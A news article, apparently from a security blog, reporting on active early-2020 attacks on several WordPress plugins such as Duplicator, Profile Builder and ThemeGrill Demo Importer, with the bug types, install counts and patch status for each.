While 2019 has been a busy year for WordPress site administrators, the start of 2020 has been quiet. The reason for this downtime could probably be the winter holidays, as hackers sometimes take a break too. However, attacks on WordPress have resumed in recent weeks, and according to experts at Wordfence, WebARX, and NinTechNet, the brief lull appears to be over. As before, the attacks are mainly aimed at exploiting vulnerabilities in various plugins, but not in the CMS itself. Listed below are which plugins are under active attack. According to Wordfence report, since mid-February, hackers have been attacking a vulnerability in the Duplicator plugin, which allows site administrators to export the contents of their resources and makes it much easier to “move from one server to another. The bug was fixed in version 1.3.28 and allowed attackers to export a copy of the site from where hackers could extract database credentials and then hack into MySQL. The problem is aggravated by the fact that at the time the attacks began, the plugin had more than a million installations, and Duplicator Pro, the commercial version of the plugin, was installed 170,000 more times.
Also, according to data from Wordfence, at least two hack groups are exploiting the problem in the free and professional versions of the Profile Builder plugin. Bug allows attackers to create new administrator accounts on vulnerable sites. Although the bug was fixed on February 10, 2020, the attacks began on February 24, the same day that the PoC exploit was published online. Currently, about 65,000 sites on which the plugin is installed are vulnerable to attacks. Attacks on
vulnerabilities in ThemeGrill Demo Importer and ThemeREX Addons products continue. The first plugin is installed on more than 200,000 sites, and the vulnerability allows attackers to erase other people's sites, and also, if the database contains a user named admin, the attacker can gain access to this account and all the corresponding rights. A bug in the second plugin also allows you to create new administrator accounts on vulnerable sites, and despite ongoing attacks, there is still no patch for it.
Websites with the Flexible Checkout Fields plugin for WooCommerce, installed on more than 20,000 resources, were also targeted by the attackers. In this case, the hackers exploited an already
patched XSS zero-day vulnerability that allowed the creation of administrator accounts on vulnerable sites. Despite the release of the patch, the attacks continued at the end of February (1, 2).
Another active campaign exploits three similar zero-day vulnerabilities found in the Async JavaScript plugins, 10Web Map Builder for Google Maps, and Modern Events Calendar Lite. These plugins are installed on 100,000, 20,000 and 40,000 sites, respectively. All three 0-day bugs were stored XSS and all three have already received fixes, however, the attacks began even before the release of the patches, which means that some sites were most likely compromised.